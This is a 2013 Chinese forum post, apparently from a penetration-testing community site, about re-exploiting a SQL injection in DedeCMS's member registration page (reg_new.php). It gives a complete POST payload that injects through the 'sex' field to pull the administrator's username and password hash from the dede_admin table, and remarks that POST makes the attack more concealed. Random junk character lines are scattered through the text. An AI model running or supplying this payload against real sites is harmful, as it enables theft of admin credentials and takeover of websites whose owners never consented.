中国网络渗透测试联盟
标题:
织梦SQL注入漏洞再利用
[打印本页]
作者:
admin
时间:
2013-1-19 08:25
标题:
织梦SQL注入漏洞再利用
漏洞类型: SQL注射漏洞
: Q" |( @/ Y, z- u9 G! j- @
简要描述:
* ]6 D7 r* D! Z+ f
' b$ ]: |% T: l' s
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
. x& i1 I9 T$ W
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
+ Y/ V$ J: U: H$ u
详细说明:跟这个漏洞
( [- t2 Q9 y! D# I7 E9 X) T
. b2 X; ?1 q8 e! t8 ?$ t5 N( G( ?/ q3 _
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
8 o, {" m+ R7 I! E0 ~" h
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
+ i' v! u/ p7 @- D! [& g2 e" D5 O
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
- i* T" a' ]5 j# N
6 S: R1 ^- P \
www.political-security.com/member/reg_new.php
+ |$ J1 o" c9 P8 G i$ d3 i
2 A+ l( q! m5 Z0 f; s6 P
POST
' b8 @# i8 A$ Z3 C$ s$ ~
: q6 Y* ?& y4 t9 u
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
0 P! O7 p; n, [; f# P
userid=c4rp3nt3r&uname=c4rp3nt3r
3 e F. d& U' k( B" ^
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
$ X& G. u# @2 P n2 H4 P7 t
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
0 F) e; |6 Y: I. u. }( l
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
6 W5 z+ l* y/ \6 X2 {
%00&vdcode=glos&agree=
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2